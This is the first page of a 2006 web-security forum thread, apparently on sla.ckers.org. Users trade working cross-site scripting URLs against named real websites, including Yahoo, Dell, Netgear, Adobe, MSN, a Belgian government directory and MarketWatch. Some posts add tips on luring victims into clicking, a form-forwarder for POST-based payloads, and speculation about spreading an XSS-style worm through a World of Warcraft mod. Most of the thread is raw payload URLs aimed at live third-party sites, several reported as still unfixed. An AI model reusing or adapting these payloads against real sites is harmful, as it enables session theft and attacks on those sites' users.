Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: 1234567891011...LastNext
Current Page: 1 of 65
So it begins
Posted by: rsnake
Date: August 21, 2006 10:24AM

http://www.alexa.com/site/site_stats/signup?site_url=http%3A%2F%2Fasdf.com%2F%3F%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&range=3m&widget=g&submitted=true&mode=graph&amzn_id=
http://www.altavista.com/web/res_text?q=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E

These have been out there for a while but are still unfixed.

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: August 21, 2006 12:09PM

Since not a lot of people read russian I thought I'd repost some of the stuff that securitylab.ru has been posting as well:

http://boards.live.com/themes/us/en/ccode.aspx?ForumId=0--></script><script>alert(String.fromCharCode(83,101,99,117,114,105,116,121,108,97,98,46,114,117))</script>
http://movies.msn.com/movies/genre.aspx?genre=Comedy&');alert('www.securitylab.ru
http://boards.live.com/Travelboards/board.aspx?BoardID=144&y000=%20--></script><script>alert(1)</script>
http://www.adobe.com/cfusion/search/index.cfm?loc=en_us&term=%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3E

He's been finding a lot lately, but they've been closing down just as fast (a good thing).

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins
Posted by: WhiteAcid
Date: August 22, 2006 08:16AM

One that would require some SEing, not only do they need to press the link, they need to press the continue button in the us users section. Still... could be used for something.

[[url=http://music.yahoo.com/ymu/country/?refurl=javascript:alert('xss');//&data=ymu&.src=]music.yahoo.com[/url]]

Edit:
Another one on the same site, just ask them to view this music video:
http://music.yahoo.com/relaunch/?vid=35111115&fp=1&app=video&skin=23&destURL=http://music.yahoo.com/promo-29644410-158-20060814'});alert('xss');//
The url didn't like being inside a [ url ] tag.

Edit:
https://www.screenselect.co.uk/visitor/sign_up_1.html?promotion_code=%22%3E%3Cscript%3Ealert('xss')%3C/script%3E - MSN's dvd rental site.
http://www.screenselect.co.uk/visitor/browse.html?node_id=6539%22asd%3E%3Cscript%3Ealert('xss')%3C/script%3E

We could post XSS flaws on major sites all day long if we really wanted.

Edit:
http://www1.euro.dell.com/content/products/category.aspx/desktops?c=uk&cs=ukdhs1&l=en&s=qwerty');alert('xss');//
Then convince them to press the "Printable version" link at the bottom right. I guess this will work on any page that has the link on it.

http://www.netgear.com/Products/BridgesAccessPointsandExtenders.aspx?for=Business+qwe%22;alert('xss');// or http://www.netgear.com/Products/BridgesAccessPointsandExtenders.aspx?for=Business+qwe%22%0aalert('xss')//

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer



Edited 5 time(s). Last edit at 08/22/2006 09:50AM by WhiteAcid.

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: August 24, 2006 10:38PM

Nice finds! Netgear should definitely know better. Eesh! Looks like the Yahoo ones are fixed (not really much of a surprise, they are pretty on top of this stuff), but the others remain intact.

Options: ReplyQuote
Re: So it begins
Posted by: Girzi
Date: August 26, 2006 11:10AM

2 xss on gov.be domain =) Cause I'm from Belgium : P

http://directory.gov.be/home/top/category_id/%22%3E%3Cimg%20src=qsd%20onerror=alert(2006)%3E

POST /home/search search_string=%22%3E%3Cscript%3Ealert%28%2FBlwood%2F%29%3C%2Fscript%3E&Submit2=Chercher+dans+directory

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: August 26, 2006 12:17PM

Well if you want to try to fool someone into thinking you get lots of traffic you can use the one on Alexa: http://www.alexa.com/site/site_stats/signup?site_url=http%3A%2F%2Fasdf.com%2F%3F%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&range=3m&widget=g&submitted=true&mode=graph&amzn_id=

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins
Posted by: Girzi
Date: August 26, 2006 01:05PM

Nice one =)
What a bout this one :
http://www.homme.lycos.fr/hotbabes/categorie/%22%3E%3Cbody%20onload=alert(%22Blwood%22)%3E

Very know in France ;) webmail, search...

Let's do a XSS challenge :P ?



Edited 3 time(s). Last edit at 08/26/2006 01:09PM by Girzi.

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: August 26, 2006 10:25PM

What kind of challenge? Or rather, is finding XSS really a challenge? :)

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: August 27, 2006 06:46PM

There's an interesting list of vulnerable sites: http://web3.m34s11.vlinux.de/xss_research.htm

Some of it appears to still work even though it was updated last month.

Options: ReplyQuote
Re: So it begins
Posted by: Girzi
Date: August 28, 2006 02:37AM

haha Nice list :) i was dead of laugh when I saw hackin9.org on the list !!

Options: ReplyQuote
Re: So it begins
Posted by: kefka
Date: August 29, 2006 05:29PM

http://www.serverspy.net/site/stats/mods.html?g=0%22%3E%3CSCRIPT%3Ealert(%22kefka%20was%20here%22)%3C/SCRIPT%3E
http://www.allakhazam.com/fsearch.html?subject=%22%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%22&content=&poster=&date1_m=1&date1_d=1&date1_y=1999&date2_m=1&date2_d=1&date2_y=2007&cats=all&dosearch=1
Major gaming websites, one for FPS games one for MMO games. Search scripts fail to sanitize quotes.

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: August 29, 2006 06:21PM

MMORPGs are an interesting avenue for spreading massive XSS worms that I hadn't thought of. Are there any MMORPGs with browser based input? Seems like a bad idea, but I could totally see why they might build a web-browser interface into games.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins
Posted by: id
Date: August 29, 2006 06:34PM

A couple...

Results 1 - 10 of about 2,270,000 for "web based mmorpg".

-id

Options: ReplyQuote
Re: So it begins
Posted by: kefka
Date: August 29, 2006 06:34PM

Yes, sir there are. I've thought a lot about it. In World of Warcraft, you're allowed to make custom UI mods. A lot of the game takes place in what they call "raid content" aka 40 man dungeons. 40 players going into a dungeon, basically. Well, damn near all of these guilds that run these dungeons require you to run a few mods that I've been interested in exploiting but I'm just a beginner. One that comes to mind is CT_Raid. It's a mod for tracking the life, mana, status effects, etc.. of all the raid members, it basically joins a chat channel and sends messages telling the rest of the channel how you're doing. I've modded mine to report version # 420.2600 and I've been very interested in the possibility of a CT_Raid worm.

If you're the raid leader or marked as an assistant, you can execute /rajoin (it's a CT_Raid command) and force everyone in the raid with CTRaid to join your CTRaid channel and sync with you. There's also a "battleground" called alterac valley that's 40 man where you get automatically put into a raid with the rest of the people on your team. I could see a worm propegating there through a vulnerability in the mod (so not owning everyone but 60-75% would be a pretty accurate number).

Like I said, I'm just a beginner but I would love for a "security expert" to take a look at the mod and either help me learn or just tell me what he thinks. They're all written in XML and LUA by the way, I realize that's very important, so there it is. But I've already seen a lot of threads on http://ui.worldofwar.net (A WoW UI development website) about executing third party programs from a UI mod but whether you're able to overflow a buffer or something, I do not know. I'm a lot more interested in SQL injection, XSS, remote file inclusion, web application security, etc.. at the moment but I wouldn't mind switching gears.

Options: ReplyQuote
Re: So it begins
Posted by: kefka
Date: August 29, 2006 06:48PM

Speaking of WoW, here's another major "WoW database"
http://www.goblinworkshop.com/search2.html?s=%5C%22%3CSCRIPT%3Ealert%28%5C%22kefka%20was%20here%5C%22%29%3C%2FSCRIPT%3E%5C%22

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: August 29, 2006 07:10PM

http://www.go2.com/webbrowser/indexSearch.cfm?isSuggestion=1&tokenString=%22%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&go2search=Category&accountAction=createTemp&StreetAddress=&city=&State=&zipcode=&radius=10&x=0&y=0

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins
Posted by: kefka
Date: August 29, 2006 07:39PM

http://comsearch.comcast.commerce.atomz.com/?q=%22%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%22&x=0&y=0
http://home.bellsouth.net/s/s.dll?spage=search%2Fresultshome1.htm&_pgoffset=0&startdate=01%2F01%2F2010&man=1&num=10&type=cat&SearchType=web&string=%22%3CSCRIPT%3Ealert%28%22kefka+was+here%22%29%3C%2FSCRIPT%3E%22&imageField.x=0&imageField.y=0&imageField=search



Edited 1 time(s). Last edit at 08/29/2006 07:41PM by kefka.

Options: ReplyQuote
Re: So it begins
Posted by: WhiteAcid
Date: August 30, 2006 03:22AM

EVE-online is a game I tried out at the start of the year, didn't like it all that much. That's a MMORPG with an in built browser. It's there so you can read the developers blog, game news and here's the kicker, pressing the website link on a clan's profile opens the ingame browser to their site, which can be hosted anywhere.

I didn't try playing with that, and doing so now would require a new subscription which costs money, but it could be fun to do. Most likely their ingame browser simply doesn't support any JavaScript though, so it cannot possibly execute anything.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: August 30, 2006 10:47AM

Hrmm... that would be odd if they didn't support JS (that would actually be surprising to me) as it's just easier to include the entire MSIE framework rather than crippled versions. But even still there are other things you can do without JavaScript, like CSRF. Really most of what the JavaScript port scanner is is a series of CSRF attacks strung together. It is possible that this could be used as a mechanism to modify firewall settings, for instance. I wonder how full featured the browsers in these things are.

There are also browsers embedded in chat clients now too... that feels ultra scary to me.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: September 02, 2006 08:33PM

http://www.traveltree.co.uk/pages/affiliatefr.asp?URL=javascript:alert('XSS');

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 05, 2006 02:32AM

http://www.sparkfun.com/commerce/advanced_search_result.php?keywords=%3Cscript%3Ealert%281337%29%3C%2Fscript%3E&x=0&y=0

one of the best (read: cheapest) places for hardware components, if your a hardware hacker.. so please be gentle.

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 05, 2006 03:29AM

http://www.uo.com/cgi-bin/search.pl?words='%3E%3Cscript%3Ealert(1337)%3C/script%3E%3Cb%20

it seems people still play ultima online..

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: September 06, 2006 03:20PM

hahah, I love the php.com one! Ouch!

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: September 06, 2006 04:29PM

id just pointed out to me that php.com is parents helping parents, not the programming language. Oops! Not quite as cool.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins
Posted by: id
Date: September 06, 2006 04:46PM

yes, a very interesting view of what kinds of things you're all into....

-id

Options: ReplyQuote
Re: So it begins
Posted by: unsticky
Date: September 06, 2006 05:15PM

Yeah... nothing too great there, on my little list. I found them a few days ago using Google when I was trying to find some Location:-based redirrect scripts for a project of mine.

Options: ReplyQuote
Re: So it begins
Posted by: WhiteAcid
Date: September 06, 2006 05:18PM

http://www.marketwatch.com/tools/marketsummary/default.asp?siteid=mktw%22%0aalert(%22asd%22)//
http://www.marketwatch.com/tools/quotes/quotes.asp?symb=qwerty&vc=&siteid=mktw%22%0aalert(%22asd%22)//&dist=dropmenu
http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.arto.com/brugere/login/default.asp?visopret=%26fc=0&destination=&returnUrl=&action=submit&brugernavn=%22%3E%3Cscript%3Ealert('xss')%3C/script%3E&kodeord=&xss_note=Basic%20XSS%20in%20the%20username%20field (using POST - actually arto.com)

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Options: ReplyQuote
Re: So it begins
Posted by: id
Date: September 06, 2006 05:42PM

I will have to grab hhh.net/com/org and make a "hackers helping hackers" site

-id

Options: ReplyQuote
Re: So it begins
Posted by: WhiteAcid
Date: September 06, 2006 07:26PM

http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://userfriendly.org/cgi-bin/survey.cgi&personalemail=%22%3E%3Cscript%3Ealert(/xss/)%3C/script%3E (userfriendly.org)
I originally contacted them on July 21st, no reply.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Options: ReplyQuote
Pages: 1234567891011...LastNext
Current Page: 1 of 65


Sorry, only registered users may post in this forum.